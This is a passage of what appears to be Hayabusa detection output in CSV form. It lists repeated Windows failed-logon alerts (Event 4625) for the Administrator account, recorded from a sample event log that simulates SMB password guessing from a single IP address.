NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yO2JYd6FfM2Y7px9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ltr5g8ZWUAdrPKxg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fjiPMy5uOTbbmaQ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HDRVOzxca9wDJziV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DV28RjUK26Je2Dr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seoetT43w0S3FEss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IdIU9Q9Ig4Bd3Aps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGzuHSHT59Qnp5jI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPA1J7aQrZ064WSf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhLFXDMUKGfdoc4S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: apVAhc6o3dhLmUll : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYMdQeB4ZpFm8xDh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QewW1ISqRdXwtSXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SFhBcgZfc9VZ5S8S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a4ZSRW7F65yDNbJd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HrbzGNYIbjErVtDR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eFcGaL3asLVIF08d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dhJvIM5PzA9U6GTD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYrfD15TPp8OuST4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8d4CbZSTHhl7fRfa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IItrtl1h3PsKviaQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVeoptuwLNKlm0V2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rf6Ri9Lm81mScRt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NPVkTRUILL5czcbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZJq3kjykwzh0hVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHL4KuirjQ96Dgfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSPjDklMHdW6LqK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EL0oMweyFgI0MEdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NJS2dZhWmCGF1Qos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bNR5dXXnx0LeyNmW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ApUMxqDiqDNo6hrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o3d1caGukhhBHp6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oxDVCaWpkSECRoml : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: coqijUGaaVJXY4GV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ATPa6qMbfQ9QDrW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mnQEE00r01jhCNzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ir9sY7kG6vbOad4z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: REuk1RZ5eRs3pSbT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 91gfIcAUvKrSAENh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtrVV1ux0v5w5XWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFpyAqPQP77Ls6ir : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvwp4DimL7SgBmb0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1lnJZDjghQNQxfG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pBN1g8NBIj6WMrhz : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cJMUobtFTwOQTgqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGZeGqe9rC172BVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zNP99dMvvDQl8WVw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qcwp0odjR0LfM11y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6VjaFCzZr8iUUovn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C3YniJHC0Cswfti0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 63lZpExTzSzNR96C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fKI61MTXJ5x9WF56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhWYNEPWgh03cQSJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvZg2LTYtsUhvBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BENGUFtNxdPjaS03 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fY1s0OG9JR38H6rm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LblLG1Il6ngkuAOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PAZ83Onp00vURKSz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxvywmA4UMI04zm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1vH6DSer71gxEDRc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDNQibannB453BKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 02qkYtCIrOj38agd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atDwGfxC4RLYYDAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fCTUmKwLxkKCoCTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBE7Y8yJMNSkJlaK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N7VGVfH05BC7bgaZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lP7kC2ayRIEeL5sw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cQOn41cB2t0ZkSP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PpOyXZwlcCw63tWP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7R8yD7A0lCU16Z0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frasd7f8On0O7B6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtOqqV6rkCIZPPFG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lnwn4dc1lKABRKxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiUnLFzfXR6rER9B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1InESrL0ebaRw2z : IP Address: 192.168.198.149 : AuthPackage: 